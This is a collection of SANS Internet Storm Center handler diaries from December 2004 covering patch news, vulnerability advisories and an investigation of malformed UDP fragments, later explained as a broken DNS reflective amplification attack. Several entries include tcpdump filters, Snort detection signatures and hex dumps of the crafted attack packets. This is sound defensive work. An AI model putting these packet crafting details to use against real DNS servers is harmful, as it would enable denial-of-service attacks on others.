--------------------------------------------------------------------

Handler on Duty for the last time this year: Pedro Bueno (pbueno /AT/ isc.sans.org)

WINS scanning increase

It looks like the s'kiddies finally got their hands on the super-secret-underground WINS 'sploit (or are simply setting up a target list for when they do), as evidenced by the increase in records and targets for port 42 scans: http://isc.sans.org/port_details.php?port=42

If you're running WINS exposed on the internet, uhm, please stop it?

Update: Mysterious UDP Solved?

One of our diligent handlers was able to locate a compromised system sending out malformed UDP packets identical to those we've been describing over the past few days. The proposed solution to this conundrum is as follows:

Mr. L. Haxor lives in the 83.102.166.0/24 netblock. Haxor irritates some of his fellow kiddies on IRC. One decides to teach Mr. Haxor a lesson, by at least partially custom coding a severely broken implementation of a relfective amplification attack via recursive DNS queries. Had his packet-fu not been so bad, this probably would have been a pretty decent attack. As it stands, it ended up being a limited resource exhaustion attack against analysts' cycles.

A big thanks to everyone who submitted packets and assisted with analysis.

For more information on how to prevent your resources from being used in a *successful* DoS attack, check out the following guide: http://www.sans.org/dosstep/

Update: Top Ten Diaries

We've received a ton of suggestions for the Top Ten Diares of 2004 - keep em coming!

We all love Tom Liston's "Follow The Bouncing Malware," too. ;)

Microsoft Black Tuesday Coming Attractions!

As a disinterested observer in the world of cyclical patching of Windows boxes, I'm always fascinated with the quasi-ritualistic undertones given to updating since Microsoft's shift to a (allegedly) monthly patch-and-release program. It's as if promptly patching on MS Tuesday is an offering of sorts to the old gods, Lovecraftian horrors the likes of which we dare not speak of lest we invoke their terrible wrath.*

... sorry 'bout that ...

* Tune in tomorrow for the chills, spills and thrills of no less than *FIVE* security bulletins!

* Recoil in horror as you realize one or more of these bulletins will be *IMPORTANT* in severity!

* Cry out as you may or may not be forced to reboot!


All this and MUCH MORE awaits you at the Microsoft Security Bulletin Advance Notification site! http://www.microsoft.com/technet/security/bulletin/advance.mspx

**********************

Cory Altheide

Handler on Duty

caltheide@isc.sans.org

**********************

*Please don't let my observations imply any sort of disdain for conscientious Tuesday patchers or those forced to admin Windows boxes. I greatly admire the sacrifices you make in order to keep the Great Old Ones from devouring the net.

Today has been a very quiet day on the net, so quiet that at times I wondered if my email was broken. Perhaps all of the "kiddies" are "being nice" so that Santa will fill their stockings with something besides coal.

The quiet gives me the opportunity to talk about our year end poll. I am the Handler on Duty for New Years Eve and thought it would be interesting to recap 2004. One way to do this is to poll you, our readers on their favorite diaries of the year.

So here is your chance. Give us your input. What do you think was the best of the best? Send us your votes and we will tally them and let you know what the results are. We look forward to hearing from you.

I want to wish all of you Happy Holidays, Merry Christmas, Happy Hanukkah and Seasons Greetings. May your holidays be filled with all of the joy and happiness that you deserve and may Santa bring you all that you hope for.

Merry Christmas
Deb Hale
Handler On Duty

Opera Fix for Window Injection Vuln, Safari Work-around

Reader Laurent sent in a note that Opera has released a fix for the Window Injection Vulnerability mentioned in yesterday's diary. Get the fix here:

http://www.opera.com/support/search/supsearch.dml?index=782

Also, according to another message received by Lenny, Safari 1.2.4 (v125.12) on OS-X 10.3.6, is NOT vulnerable to the exploit if the pop-up blocker is enabled. It IS vulnerable if the pop-up blocker is disabled.

Refer to yesterday's diary for more information and tests.

http://isc.sans.org/diary.php?date=2004-12-10

Continued request for Specific UDP Fragment Data

Quoting from Lenny's Diary Yesterday:

My fellow handlers are in the process of analyzing the odd UDP packets that we've discussed in the past few diaries. Thank you to everyone who has shared their traces with us. We hope to provide you with a comprehensive analysis as soon as we correlate and analyze the data we've collected.

We have enough generic data for now; however, we would like to take a closer look at certain types of packets. If you have seen UDP fragments with the TTL value of 57 or higher that came from the 83.102.166.0 network, please send us your trace. If sending the packets to us, please indicate the name of your upstream provider, if you can. Also, please tell us whether it's OK for us to share the IP addresses that you saw and the TTL values with a group of ISP security professionals.

You can capture such UDP "interesting" traffic using the following Tcpdump filter:

src net 83.102.166 and \
(ip[6] & 0x02 = 0 and ip[6:2] & 0x1fff !=0) and \
((ip[8] > 56) or (ip[2:2] != 45))

You can capture such UDP "interesting" traffic using the following Snort signatures:

alert ip 83.102.166.0/24 any -> any any \
(msg: "ISC Handlers - UDP Frag Hunt - Narrowing TTL"; \
byte_test: 2,=,45,2; \ # len = 45
byte_test: 2,=,64,6; \ # fake frag
byte_test: 1,>,56,8; \ # ttl higher than 56
content: "|11EF 0035 0019 50D7 71F7 0100 0001 0000 0000 0000 0000 0200 01|";) # DNS root NS query

alert ip 83.102.166.0/24 any -> any any \
(msg: "ISC Handlers - UDP Frag Hunt - Bigger Packets"; \
byte_test: 2,>,45,2; \ # len > 45
byte_test: 2,=,64,6; \ # fake frag
content: "|11EF 0035 0019 50D7 71F7 0100 0001 0000 0000 0000 0000 0200 01|";) # DNS root NS query

Thanks to handler Erik Fichtner for putting these signatures together.

Reading Room

It's been a very pleasant (read: quiet) Saturday. So for your reading enjoyment, here are a few links that I found interesting today from a couple of different places:

Slashdot: Penn State Tells Students To Ditch IE
http://it.slashdot.org/article.pl?sid=04/12/11/2035222&tid=172&tid=113&tid=146&tid=220&tid=218

Security Focus: Detecting Complex Viruses

http://www.securityfocus.com/infocus/1813

SANS Reading Room: Dead Linux Machines Do Tell Tales, by James Fung

http://www.sans.org/rr/whitepapers/honors/1491.php (724K)

Good night, and have a pleasant tomorrow!

-db

Dave Brookshire
Handler-on-Duty

Multiple Browsers Affected by a Window Injection Vulnerability

You may have already heard of a vulnerability, announced by Secunia on December 8th, which affects all commonly-used browsers. The vulnerability allows a website loaded in one browser window to control a pop-up that is opened from another window. The danger here is that a malicious site can spoof contents of a pop-up window that is opened from a trusted site, particularly in the context of phishing attacks.

We tested Secunia's proof-of-concept exploit code with Firefox, Internet Explorer, and Opera. The exploit worked as advertised. The workaround suggested by Secunia is: Do not browse untrusted sites while browsing trusted sites.

We found another workaround that seems to work for users of Firefox: Install the Tabbrowser Extensions extension for Firefox. This extension allows Firefox users to control tabbed browsing features. Our limited tests suggest that installing this extension with default options makes Firefox immune to the proof-of-concept exploit.

The Secunia advisory:

http://secunia.com/secunia_research/2004-13/advisory/

The Secunia proof-of-concept exploit to test your browser:

http://secunia.com/multiple_browsers_window_injection_vulnerability_test/

The Tabbrowser Extensions extension for Firefox:

http://piro.sakura.ne.jp/xul/_tabextensions.html.en

Request for Specific UDP Fragment Data

My fellow handlers are in the process of analyzing the odd UDP packets that we've discussed in the past few diaries. Thank you to everyone who has shared their traces with us. We hope to provide you with a comprehensive analysis as soon as we correlate and analyze the data we've collected.

We have enough generic data for now; however, we would like to take a closer look at certain types of packets. If you have seen UDP fragments with the TTL value of 57 or higher that came from the 83.102.166.0 network, please send us your trace. If sending the packets to us, please indicate the name of your upstream provider, if you can. Also, please tell us whether it's OK for us to share the IP addresses that you saw and the TTL values with a group of ISP security professionals.

You can capture such UDP "interesting" traffic using the following Tcpdump filter:

src net 83.102.166 and \

(ip[6] & 0x02 = 0 and ip[6:2] & 0x1fff !=0) and \

((ip[8] > 56) or (ip[2:2] != 45))

You can capture such UDP "interesting" traffic using the following Snort signatures:

alert ip 83.102.166.0/24 any -> any any \

(msg: "ISC Handlers - UDP Frag Hunt - Narrowing TTL"; \

byte_test: 2,=,45,2; \ # len = 45

byte_test: 2,=,64,6; \ # fake frag

byte_test: 1,>,56,8; \ # ttl higher than 56

content: "|11EF 0035 0019 50D7 71F7 0100 0001 0000 0000 0000 0000 0200 01|";) # DNS root NS query

alert ip 83.102.166.0/24 any -> any any \

(msg: "ISC Handlers - UDP Frag Hunt - Bigger Packets"; \

byte_test: 2,>,45,2; \ # len > 45

byte_test: 2,=,64,6; \ # fake frag

content: "|11EF 0035 0019 50D7 71F7 0100 0001 0000 0000 0000 0000 0200 01|";) # DNS root NS query

Thanks to handler Erik Fichtner for putting these signatures together.

Lenny Zeltser

ISC Handler of the Day

http://www.zeltser.com

Mike Poor, stepping in for Pedro Bueno until he is back online

Update on the UDP strange packets

I would like to thank over 50 people that sent packets, logs and theories into the ISC and to me personally. We still do not know "what" or "why", but we do know a number of things:

- About 30 sources are being used in these packets, all from the 83.102.166.0/24 netblock
- Firewalls and IDS'es seem to be misrepresenting port numbers in a parser error (either showing src and dst ports as being 65535 or 16191)
- Destinations are all DNS servers, and seem to be the authoritative name server for the zone
- Some destinations are not actually DNS servers, but they are listed as Authoritative servers for that zone
- Destinations are all over the world, from educational institutions, government, commercial, and non profit (.org)
The payload of the packet seems to be a crafted recursive query for root ("."). Master packet guru George Bakos reconstructed the packet using Netdude (netdude.sourceforge.net) fixed the checksum, and ran it through tethereal. This is what tethereal comes up with:

Internet Protocol, Src Addr: 83.102.166.46 (83.102.166.46), Dst Addr: x.x.x.75 

    Version: 4

    Header length: 20 bytes

    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)

        0000 00.. = Differentiated Services Codepoint: Default (0x00)

        .... ..0. = ECN-Capable Transport (ECT): 0

        .... ...0 = ECN-CE: 0

    Total Length: 45

    Identification: 0x1e65 (7781)

    Flags: 0x00

        0... = Reserved bit: Not set

        .0.. = Don't fragment: Not set

        ..0. = More fragments: Not set

    Fragment offset: 0

    Time to live: 55

    Protocol: UDP (0x11)

    Header checksum: 0xf835 (correct)

    Source: 83.102.166.46 (83.102.166.46)

    Destination: x.x.x.75 (x.x.x.75)

User Datagram Protocol, Src Port: 4591 (4591), Dst Port: 53 (53)

    Source port: 4591 (4591)

    Destination port: 53 (53)

    Length: 25

    Checksum: 0x0a7a (correct)

Domain Name System (query)

    Transaction ID: 0x71f7

    Flags: 0x0100 (Standard query)

        0... .... .... .... = Response: Message is a query

        .000 0... .... .... = Opcode: Standard query (0)

        .... ..0. .... .... = Truncated: Message is not truncated

        .... ...1 .... .... = Recursion desired: Do query recursively

        .... .... .0.. .... = Z: reserved (0)

        .... .... ...0 .... = Non-authenticated data OK: Non-authenticated data is unacceptable

    Questions: 1

    Answer RRs: 0

    Authority RRs: 0

    Additional RRs: 0

    Queries

        <Root>: type NS, class inet

            Name: <Root>

            Type: Authoritative name server

            Class: inet



0000  02 02 02 02 02 02 01 01 01 01 01 01 08 00 45 00   ..............E.

0010  00 2d 1e 65 00 00 37 11 f8 35 53 66 a6 2e XX XX   .-.e..7..5Sf...E

0020  XX 4b 11 ef 00 35 00 19 0a 7a 71 f7 01 00 00 01   .K...5...zq.....

0030  00 00 00 00 00 00 00 00 02 00 01 00               ............

Tom Liston , of Labrea | GDI Scanner | Color Orange | or Bouncing Malware fame, did some statistical analysis on the source addresses that he was receiving and notices that only about 30 of the possible 254 addresses from the /24 network were being used, with a non even distribution of randomness. Here is the statistical output:

Count	        IP		%

39		22		2.11%

40		42		2.16%

41		4		2.22%

43		58		2.33%

46		47		2.49%

47		17		2.54%

48		55		2.60%

49		1		2.65%

49		26		2.65%

49		53		2.65%

53		48		2.87%

54		43		2.92%

55		49		2.98%

58		7		3.14%

58		76		3.14%

59		41		3.19%

59		59		3.19%

61		45		3.30%

62		217		3.35%

64		54		3.46%

64		15		3.46%

64		12		3.46%

66		23		3.57%

70		33		3.79%

70		52		3.79%

71		44		3.84%

73		131		3.95%

109		21		5.90%

111		24		6.01%

116		46		6.28%

The main thing to find now is to look for these packets leaving someone's network. This would show if this is some broken client or malicious code.

Grand Mistress of Packetdom Judy Novak from Sourcefire noticed that in bytes 6 & 7 offset from zero of the IP header, we see 0x 00 40 (hence the 512 frag offset). If some lame coder hardcoded these numbers, and perhaps did not do a host to network byte order swap (which would have made the bytes 0x 40 00 which would correspond to the Dont Fragment DF flag being set).

If you see this traffic leaving your network, or if you see any responses fromyour hosts to this traffic, please send us packets.

A special thanks to all who have contributed with time, packets, and continued analysis,

Mike Poor
From Yesterday's diary on this subject:

Strange UDP packets everywhere
A poster to the ISC sent us some strange UDP packets he had been seeing on his network. The first strange thing that comes to view is that all the fragments included in the traces are the last fragment of a fragment train, and all of them placed 25 bytes of data at offset 512 (which coincides with the maximum payload for DNS replies over UDP (eDNS not withstanding).

Here is some sample traffic that was posted to Dshield back in October, that perfectly matches what the current poster is seeing:

10:13:19.754558 83.102.166.48 > aa.bb.cc.71: (frag 25411:25@512) (ttl 55, len 45)

0x0000   4500 002d 6343 0040 3711 d0ca 5366 a630        E..-cC.@7...Sf.0

0x0010   xxxx xx47 11ef 0035 0019 282d 71f7 0100        ...G...5..(-q...

0x0020   0001 0000 0000 0000 0000 0200 016f             .............o

10:13:20.674641 83.102.166.7 > aa.bb.cc.71: (frag 38795:25@512) (ttl 55, len 45)

0x0000   4500 002d 978b 0040 3711 9cab 5366 a607        E..-...@7...Sf..

0x0010   xxxx xx47 11ef 0035 0019 2856 71f7 0100        ...G...5..(Vq...

0x0020   0001 0000 0000 0000 0000 0200 0106             ..............

10:13:27.211002 83.102.166.33 > aa.bb.cc.71: (frag 9664:25@512) (ttl 55, len 45)

0x0000   4500 002d 25c0 0040 3711 0e5d 5366 a621        E..-%..@7..]Sf.!

0x0010   xxxx xx47 11ef 0035 0019 283c 71f7 0100        ...G...5..(<q...

0x0020   0001 0000 0000 0000 0000 0200 0148             .............H 

Another odd thing is that all similar traffic we have seen is coming out of this same netblock 83.102.166.0/24 which belongs to corbina.net out of Russia.

Has anyone seen similar traffic? You can capture this traffic with the following tcpdump filter:

tcpdump {options to your liking} 'src net 83.102.166 and (ip[6] & 0x02 = 0 and ip[6:2] & 0x1fff !=0)'

If you see packets, please send them to the ISC.


(P.S. We have also heard a rumor that there might be some packets that are not
quite like the others! If you're interested in hunting them, add "and ip[2:2] != 45" into that tcpdump command above! Thanks!)

Strange UDP packets everywhere


A poster to the ISC sent us some strange UDP packets he had been seeing on his network. The first strange thing that comes to view is that all the fragments included in the traces are the last fragment of a fragment train, and all of them placed 25 bytes of data at offset 512 (which coincides with the maximum payload for DNS replies over UDP (eDNS not withstanding).

Here is some sample traffic that was posted to Dshield back in October, that perfectly matches what the current poster is seeing:

10:13:19.754558 83.102.166.48 > aa.bb.cc.71: (frag 25411:25@512) (ttl 55, len 45)

0x0000   4500 002d 6343 0040 3711 d0ca 5366 a630        E..-cC.@7...Sf.0

0x0010   3f95 1647 11ef 0035 0019 282d 71f7 0100        ?..G...5..(-q...

0x0020   0001 0000 0000 0000 0000 0200 016f             .............o

10:13:20.674641 83.102.166.7 > aa.bb.cc.71: (frag 38795:25@512) (ttl 55, len 45)

0x0000   4500 002d 978b 0040 3711 9cab 5366 a607        E..-...@7...Sf..

0x0010   3f95 1647 11ef 0035 0019 2856 71f7 0100        ?..G...5..(Vq...

0x0020   0001 0000 0000 0000 0000 0200 0106             ..............

10:13:27.211002 83.102.166.33 > aa.bb.cc.71: (frag 9664:25@512) (ttl 55, len 45)

0x0000   4500 002d 25c0 0040 3711 0e5d 5366 a621        E..-%..@7..]Sf.!

0x0010   3f95 1647 11ef 0035 0019 283c 71f7 0100        ?..G...5..(<q...

0x0020   0001 0000 0000 0000 0000 0200 0148             .............H 

Another odd thing is that all similar traffic we have seen is coming out of this same netblock 83.102.166.0/24 which belongs to corbina.net out of Russia.

Has anyone seen similar traffic? You can capture this traffic with the following tcpdump filter:

tcpdump {options to your liking} 'src net 83.102.166 and (ip[6] & 0x02 = 0 and ip[6:2] & 0x1fff !=0)'

If you see packets, please send them to the ISC.

Amazon.com having issues

Yesterday we had a number of reports of users having trouble reaching and working with Amazon.com. This story seems to have made headlines on CNN

http://www.cnn.com/2004/TECH/internet/12/06/amazon/index.html

After contacting Amazon, they mentioned that the site was experiencing back end database issues and that these issues should be resolved by today, Dec 8th.

LATAM NIC

In other news... Latin America's NIC was having issues resolving yesterday causing pain for some users in the .ar, .br and other Latin American TLD's.

CDI East begins this week

For those of you showing up for the grand CDI East (Dec 7-14) in Washington DC, Internet Storm Center handlers will be around giving talks, teaching class, and hanging out. Stop by and see us whereever strange packets may be...

over and out,

Mike Poor

mike [a|t] intelguardians.com

CA Unicenter Remote Control Authentication Bypass

Computer Associates has announced an authentication bypass in their Unicenter Remote Control product. From the horse's mouth: "A Unicenter Remote Control (URC) Management Console version 6.0 SP1 may allow any user that has been authenticated by the underlying Operating System to connect to another URC 6.0 Management Server. This may allow unauthorized users to administer and configure the Remote Control Enterprise managed by this management server."

But we all trust our users, right? :-)

For more details and fixes go to CA support:
http://esupport.ca.com/index.html?/public/rco_controlit/infodocs/securitynotice.asp

RSSH/scponly security circumvention

Jason Wies recently discovered weaknesses in the operation of rssh and scponly. Both programs are restricted shells designed to afford secure transfer capabilities to end users without allowing them full shell access. However, end users may pass arguments to several of the programs these shells allow to be executed that will execute any program on the target system.

This problem is fixed in the latest version of scponly. No official fix for rssh is available or expected, as the author has ceased work on the program.

More details are available at Secunia -

For rssh: http://secunia.com/advisories/13363/

For scponly: http://secunia.com/advisories/13364/



Nicholas Gregoire of Exaprobe published a report today which detailed vulnerabilities in "w3who.dll," an IIS ISAPI extension which was until recently available from Microsoft and can reportedly be found in the Windows 2000/XP Resource Kits. I'm not aware of how widely deployed, but it's used to "display the browser client context" and "list security identifiers, privileges, env variables." If you're the person using this DLL, you should probably stop, since one of the vulnerabilities is a buffer overflow.

Exaprobe's advisory: http://www.exaprobe.com/labs/advisories/esa-2004-1206.html

Winamp Fix

A new version of Winamp is available which fixes the vulnerability described in the 11/24 Diary ( http://isc.sans.org/diary.php?date=2004-11-24 ). There is working exploit code circulating for this, so if you're a Winamp user it's recommended that you update.

Changelog available here: http://winamp.com/player/version_history.php

Defeating Encryption

The ISC's very own John Bambenek has authored a paper demonstrating the risks involved with placing blind faith in the security of strong network encryption.*

<i>"There is no dispute about the need for strong encryption, particularly for privileged communications. There is no way to have a high level of assurance that the entire path between endpoints of a message is secure, so the message has to be hidden in transit. While brute-force decryption is possible, modern forms of encryption have made this process too long to be valuable.

However, there is still risk if the endpoints of the communication are vulnerable. Eventually the encrypted message needs to be decrypted in order to be useful, and that process happens at the endpoints of the communication. The problem is, if the endpoints are compromised, the entire message can be stolen even if the plaintext message is not stored on a file on the system."</i>

The (very good) paper can be accessed here: http://www.infosecwriters.com/text_resources/pdf/Defeating_Encryption.pdf

***********************

Cory Altheide

Handler-at-Large

caltheide@isc.sans.org

***********************


*I don't want cryptogeeks jumping on me for being a cryptobigot. I love crypto, but I realize that it's only one cog in the beastly infosec machine.

FTP Vulnerability and activity

With a significant increase in Port 21 traffic over the past few days;

http://isc.sans.org/port_details.php?port=21&days=120



Coupled with a release by Secunia regarding WS_FTP;



@ Secunia:

Release Date: 2004-11-30

WS_FTP Server FTP Commands Buffer Overflow Vulnerabilities

Vendor:

Ipswitch

http://secunia.com/advisories/13334/

Highly critical

Impact: System access

Where: From remote

Solution Status: Unpatched



Software: WS_FTP Server 3.x

WS_FTP Server 4.x

WS_FTP Server 5.x

Successful exploitation allows execution of arbitrary code.



The vulnerabilities have been confirmed in version 5.03. Other versions may
also be affected.



NOTE: Exploit code has been published.



This creates a situation in which we have a known vulnerability actively being searched and, possibly, successfully compromise of systems.



Solution:

A good policy would go a long way in protecting against this vulnerability. Grant only trusted users access to a vulnerable server, and Filter overly long arguments in a FTP proxy.





Tony Carothers

Handler on Duty



with help from P. Noli.... er, Nolan

More IFRAME, phishing and BHOs

The last 24 hours have been relatively quiet. We received reports of another website that is serving up a nice IFRAME exploit. So if you haven't patched yet, it would be a very good idea to do so or consider using another browser. Most of the email consisted of more phishing attempts and one that appears the individual had a Browser Helper Object installed. Just a reminder that the BHODemon is a good tool to have on your system to help protect against BHOs. It can be found for free at

http://www.definitivesolutions.com/bhodemon.htm


Java Security

While doing some research on the Internet during my shift, I stumbled across a nice document that goes very indepth into Java Security and exploits called "Java and Java Virtual Machine Security Vulnerabilities and their Exploitation Techniques" that I wanted to pass along. It is a little outdated, but the concepts of understanding the orgins of Java, how it works and the security issues, up till the time the document was written, was nicely done. So in all your free time over the holidays(yes I know, "what free time"), it might provide some interesting reading.


http://www.lsd-pl.net/documents/javasecurity-1.0.0.pdf

Now I have to go and continue my moping....Army lost to Navy.

Lorna Hutcheson

Handler on Duty

http://www.iss-md.com

MacOS X Security Update:

While MS usually gets all the press with it's updates, us MacOS X users shouldn't be left out on security announcements. Apple released the next set of security updates that include patches for Apache, Appkit, Safari, Cyrus IMAP, HIToolbox, iCal, Kerebos, Postfix, PSNormalizer, Quicktime Streaming Server, Safari, and Terminal. Patch 'em up and keep 'em safe, folks.

http://docs.info.apple.com/article.html?artnum=61798

MS04-040 and MS04-038

The MS04-040 patch says it's a replacement for MS04-038, but Chris Mosby pointed out that it appears that certain systems will require MS04-038 applied still. 64 bit versions of Windows and Windows 2003 will still need to be patched with MS04-038.

--------------
Handler On Duty,
Davis Ray Sickmon, Jr

Sun bulletins.

Three sun bulletins are out. One is related to a known issue with Java.
The second is related to a local vulnerability in ping. The third is for
Netscape 7.X on Solaris.

http://sunsolve.sun.com/search/document.do?assetkey=1-26-57591-1

http://sunsolve.sun.com/search/document.do?assetkey=1-26-57675-1

http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1

MS04-040.

MS04-040 seems to have generated some discussion.
Some readers have reported that the update did not install correctly,
or did not mitigate the IFRAME vulnerability. Other conversations
have involved the timing of the update release. Feel free to chime
in and tell us your thoughts and experiences with this patch.
I installed it via WindowsUpdate and then checked the DLL versions
after a reboot. Lo and behold they were not the correct versions.
There are reports the PoC code may in fact still work. I manually
downloaded and installed the patch and it seems to have worked.
I was not able to do extensive testing.

Anti-spam DDoS = dumb!

This one is my own personal view. I find the anti-spam downloadable
DDoS tool to be without a doubt irresponsible, possibly illegal, sets
a really bad precedent, gives the wrong impression to users, and possibly
the dumbest thing I have heard of this week. Vigilante-ism is not a good
idea. The reasons are just too numerous to list. At least the web site
is no longer available.

Did you know?

ISC handlers are not paid for their work. In fact we are volunteers. These
opinions are my own.

Cheers,
Adrien

Microsoft Patch for IFRAME vulnerability

Looks like our (worldwide) requests touched Microsoft feelings...
Today Microsoft released a patch for the IFRAME Vulnerability, released on November 2nd.

Ok, it is late, but still worthwhile!

As Microsoft says in the Microsoft Security Bulletin MS04-040, "Recommendation: Customers should install the update immediately.".

We didnt test it yet, but we strongly advise you to test and apply as soon as possible.



Remember the recent incident with The Register and Iframe exploit? (http://isc.sans.org/diary.php?date=2004-11-22 ). This can happen again with whatever other website, and in fact, we are still receiving reports of possible websites spreading the exploit. So, despite of the unofficial patches, for sale or even free, now you have a chance to protect yourself if you are still using IE, with an official patch released by Microsoft.

References: http://www.microsoft.com/technet/security/bulletin/ms04-040.mspx
and http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1050


----------------------------------------------------------

Handler on Duty: Pedro Bueno (pbueno /AT/ isc.sans.org)